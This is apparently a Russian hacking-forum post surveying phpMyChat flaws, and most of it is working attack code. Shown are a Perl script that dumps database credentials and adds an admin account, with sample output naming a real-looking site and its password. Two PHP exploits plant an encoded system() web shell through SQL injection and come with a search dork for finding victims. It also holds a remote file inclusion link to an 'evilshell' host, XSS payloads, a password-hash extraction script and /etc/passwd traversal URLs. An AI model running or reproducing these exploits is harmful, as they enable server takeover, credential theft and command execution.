[Обзор] Уязвимости phpMyChat Доброй ночиМой новый обзор посвящён описанию уязвимостей чатов phpMyChat. Офф. сайт: http://www.phpheaven.net/phpmychat:home Сорцы: Скачать phpMyChat 0.14.5 Remote Improper File Permissions Exploit PHP: #################################################################### # # _____ _ # | ___| | _____ ___ # | |_ | |/ _ \ \ /\ / / # | _| | | (_) \ V V / # |_| |_|\___/ \_/\_/ # Security Group. # # * phpMyChat remote sploit * # by sysbug # # C:\Perl\bin>perl pmc.pl www.kublooddrive.com /chat # /* Mysql dump : # * C_DB_HOST : localhost # * C_DB_NAME : jhawk_pchat1 # * C_DB_USER : jhawk_pchat1 # * C_DB_PASS : vvejTjeLgB # * # * Adding Admin .... # * login:jhawk # * pwd:owned # */ # C:\Perl\bin> # # Credits: all my friends! use IO::Socket; if(@ARGV < 2){ usage(); } main(); sub sock(){ $ock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp',Timeout=>10)|| die " * s0ck null -\n"; print $ock "$path\r\n"; print $ock "Accept: */*\r\n"; print $ock "Accept-Language: pt\r\n"; print $ock "Accept-Encoding: gzip, deflate\r\n"; print $ock "User-Agent: l33t br0ws3r\r\n"; print $ock "Host: $host\r\n"; print $ock "Connection: Keep-Alive\r\n\r\n\r\n"; $path = ''; } sub main(){ print "/*\n"; print " * sploit remote phpMychat\n"; print " * by sysbug\n"; print " *\n"; $host = $ARGV[0]; $folder = $ARGV[1]; $path = "GET $folder/chat/setup.php3?next=1 HTTP/1.1"; sock(); $result =1; while($recv = <$ock>){ if($recv =~ /(C_DB_PASS|C_DB_USER|C_DB_NAME|C_DB_HOST)(.*)(VALUE=)(")(.*)(">)/){ $c++; print " * Mysql dump :\n" if($result); print " * $1 : $5\n"; $mysql[$c] = $5; $result = ''; } else{ print " * sploit failed! \n"; print " *\\ \n"; exit; } } close($ock); $path = "GET $folder/chat/setup.php3?next=2&Form_Send=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1 HTTP/1.1"; sock(); while($recv = <$ock>){ if($recv =~ /(ADM_LOG)(.*)(VALUE=)(")(.*)(">)/){ $c++; $mysql[$c] = $5; } } close($ock); $pwd="owned"; $path = "GET $folder/chat/setup.php3?next=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1&ADM_LOG=$mysql[5]&ADM_PASS=$pwd&Form_Send=3&Exist_Adm=1 HTTP/1.1"; sock(); if($mysql[5]){ print " *\n * Adding Admin ....\n * login:$mysql[5]\n * pwd:$pwd \n *\\ \n"; } else{ print " * sploit failed! \n"; print " *\\ \n"; } close($ock); } sub usage(){ print "/*\n"; print " * sploit remote phpMychat\n"; print " * by sysbug\n"; print " * usage: perl $0 xpl.pl <host>\n"; print " * example: perl $0 xpl.pl www.site.com\n"; print " * perl $0 xpl.pl www.site.com /chat\n"; print " */\n"; exit; } # milw0rm.com [2004-12-22] phpMyChat <= 0.14.5 (SYS enter) Remote Code Execution Exploit PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "PHPMyChat <= 0.14.5 \"SYS enter\" remote cmmnds xctn 0day\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHPMyChat\r\n"; echo "cmd: a shell command\r\n"; echo "Options:\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php3\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; die; } # explaination: # # sql injection in chat/messagesL.php3 near lines 56-60: # ... # If ($room != stripslashes($R)) // Same nick in another room # { # $DbLink->query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')"); # $kicked = 3; # } # ... # # have a look to "T" argument, it is not sanitized before to be used in our # INSERT query, so we can inject all the values we want and store them # in the c_messages table. Also it is not delimited by quotes & we do not need # quotes to extend the query, so this works regardless of magic_quotes_gpc settings # # sprintf() should be passed to an eval() near line 197: # # ... # // "System" messages # else # { # if ($Dest == " *") # { # $Message = "[".L_ANNOUNCE."]<BDO dir=\"${textDirection}\"></BDO> ".$Message; # } # else # { # if ($Dest != "") $NewMsg .= "<B><BDO dir=\"${textDirection}\"></BDO>>[".htmlspecialchars(stripslashes($Dest))."]<BDO dir=\"${textDirection}\"></BDO></B> "; # $Message = str_replace("$","\\$",$Message); // avoid '$' chars in nick to be parsed bellow # eval("\$Message = $Message;"); # }; # $NewMsg .= "<SPAN CLASS=\"notify\">".$Message."</SPAN></P>"; # }; # ... # # but what happen if we inject a system() call instead and if we simulate # to be the SYS user? :) # # this is 0day, enjoy it error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $action=$argv[3]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query #let's store a shell in c_messages table $L="L=english"; $U=""; $T ="0,"; //type $T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) $T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) $T.="0,";//latin1 $T.="9999999999,";//m_time $T.="1,";//address //message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() //u can use an unlimited number of chars for this $T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; $T="T=".urlencode($T); for ($i=0; $i<=1; $i++) //redo { srand(make_seed()); $anumber = rand(1,99999); $R="R=Default".$anumber; //random, it must be different from the previous one $packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R HTTP/1.0\r\n"; $packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; //debug //echo quick_dump($packet); sendpacketii($packet); } sleep(2); #step 2 -> shell is passed to an eval(), so we launch commands $packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; //debug //echo quick_dump($packet); sendpacketii($packet); echo $html; ?> # milw0rm.com [2006-04-05] phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "PHPMyChat 0.15.0dev \"SYS enter\" remote cmmnds xctn 0day (again)\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "-> works with magic_quotes_gpc=Off\r\n\r\n"; echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHPMyChat\r\n"; echo "cmd: a shell command\r\n"; echo "Options:\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; die; } # explaination: # # only modified this one: # # http://retrogod.altervista.org/phpmychat_0145_xpl.html # # actually I tested this package: # # http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download # # code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject # an "always true" statement in PWD_Hash argument error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $action=$argv[3]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #step 1 -> Register, we need an online user srand(make_seed()); $anumber = rand(1,99999); $data="FORM_SEND=1"; $data.="&L=italian"; $data.="&U=suntzu".$anumber; $data.="&pmc_password=suntzoi".$anumber; $data.="&FIRSTNAME=suntzu"; $data.="&LASTNAME=suntzoi"; $data.="&GENDER=1"; $data.="&COUNTRY="; $data.="&WEBSITE="; $data.="&[email protected]"; $data.="&SHOWEMAIL=0"; $data.="&submit_type=Registrati"; $packet ="POST ".$p."chat/register.php HTTP/1.0\r\n"; $packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: CookieLang=italian;\r\n\r\n"; $packet.=$data; #debug #echo quick_dump($packet); sendpacketii($packet); #step 2 -> Login $packet ="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H"; $packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); #step 3 -> SQL Injection, let's store a shell in c_messages table $L="L=english"; $U="U=SYS%20enter"; $T ="0,"; //type $T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) $T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) $T.="0,";//latin1 $T.="9999999999,";//m_time $T.="1,";//address //message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() //u can use an unlimited number of chars for this $T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; $T="T=".urlencode($T); $PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*"; $PWD=urlencode($PWD); for ($i=0; $i<=1; $i++) //redo { srand(make_seed()); $anumber = rand(1,99999); $R="R=Default".$anumber; //random, it must be different from the previous one $packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n"; $packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); } sleep(1); #step 4 -> shell is passed to an eval(), so we launch commands $packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); echo $html; ?> # milw0rm.com [2006-04-06] RFI and Multiple XSS in PhpMyChat Remote File Inclusion: Code: POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell Multiple XSS Code: a. [I]Vulnerable URL:[/I] http://localhost/phpmychat/chat/deluser.php3 Parameter = LIMIT [I]POC:[/I] http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-8859- 1&medium=10&FontName= >"'><img%20src%3D%26%23x6a;%26%23x61;% 26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23 x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert (%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26% 23x20;Here%26quot;)> b. [I]Vulnerable URL:[/I] http://www.localhost/mychat/chat/deluser.php3 Parameter = LIMIT [I]POC:[/I] http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=> "'><img%20src%3D%26%23x6a;%26%23x61;%2 6%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x 72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert( %26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x 20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD= c. [I]Vulnerable URL:[/I] http://www.localhost/phpmychat/chat/edituser.php3 Parameter= Link , still lokking for pOC ;) d. [I]Vulnerable URL:[/I] http://localhost/phpmychat/chat/users_popupL.php3 Parameter = LastCheck [I]POC:[/I] http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat. php3&L=english&LastCheck= "></STYLE><STYLE>@import"javascript: alert('This%20XSS%20Is%20Xss')";</STYLE>' e. [I]Vulnerable URL:[/I] http://localhost/phpmychat/chat/users_popupL.php3 Parameter = B [I]POC:[/I] http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat. php3&L=english&LastCheck=1196698786&B= >"><script>alert("This%20XSS%20Test%20Succe ssful")</script> f. [I]Vulnerable URL:[/I] http://localhost/phmychat/chat/users_popupL.php3 Parameter =From [I]POC:[/I] http://localhost/phpmychat/chat/users_popupL. php3?From=>"><script>alert("This%20XSS%20Test% 20Successful")</script> g. [I]Vulnerable URL:[/I] http://localhost/phpmychat/chat/config/start_page.css.php3 Parameter = FontName Parameter = medium h. [I]Vulnerable URL:[/I] http://localhost/phpmychat/chat/config/style.css.php3 Parameter = FontName Parameter = medium [I]POC:[/I] http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=iso-8859- 1&medium=10&FontName=>"'><img%20src%3D%26% 23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;% 26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23 x74;%26%23x3a;alert(%26quot;This%26%23x20;XSS%26% 23x20;Test%26%23x20;Successful%26quot;)> Try the second one urself or mail me to have the POC :P (c)
phpMyChat 0.14.6 Уязвимости чата версии 0.14.6 SQL-injection в модулях usersH.php и usersL.php POC: Code: http://127.0.0.1/phpmychat/usersH.php?L=english&R='%20union%20select%20concat(username,0x3a,password),2,3,4%20from%20c_reg_users/* SQL-injection в модуле whois_popup.php Code: #!/usr/bin/perl $argc = $#ARGV + 1; unless ($argc == 2) { print "usage: $0 host path_to_chat\n"; print "Ex. $0 127.0.0.1 phpmychat\n"; exit -1; } #http://127.0.0.1/phpmychat/whois_popup.php?L=russian&U='%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20c_reg_users%20limit%201/* use LWP::UserAgent; use HTTP::Request; $host = $ARGV[0]; $dir = $ARGV[1]; $file = "whois_popup.php"; $param = "?L=english&U='%20union%20select%201,concat(0x242424,username,0x3a,password,0x242424),3,4,5,6,7,8,9,10,11%20from%20c_reg_users%20limit%200,1/*"; $ua = LWP::UserAgent->new; #$ua->proxy ("http", "http://$proxy_host:$proxy_port/"); $url = "http://$host/$dir/$file$param"; $req = HTTP::Request->new (GET => $url); $req->content_type ("text/html"); $res = $ua->request ($req); die ("ERROR: " . $res->status_line) unless ($res->is_success); $content = $res->content; if ($content =~ /\x24\x24\x24([^:]+:.{32})\x24\x24\x24/) { print "$1\n"; } exit 0; зы. Solide Snake, plz, поправь ссылку на их сайт
1. Обход аутентификации. Удаленный атакующий может послать специально сформированный POST запрос к файлу edituser.php3, в котором значение “do_not_login” равно “false”. 2. Обход каталога в admin.php3. Удаленный атакующий может воспользоваться этой уязвимостью и получить доступ к важной информации на системе. 3. Межсайтовое выполнение сценариев. Данные, передаваемые параметру “C” в сценарии input.php3 не проверяются, что позволяет атакующему выполнить произвольный сценарий в браузере жертвы. 4. SQL-инъекция. Различные параметры в сценарии usersL.php3 не проверяются. Удаленный атакующий может управлять SQL запросами. Пример/Эксплоит: Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What= Body&L=russian&user=[USE R]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00 Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What =Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/ Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What =[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1 Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/ passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&s Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/* Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/* Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20email,null,null,null %20FROM%20%20c_reg_users
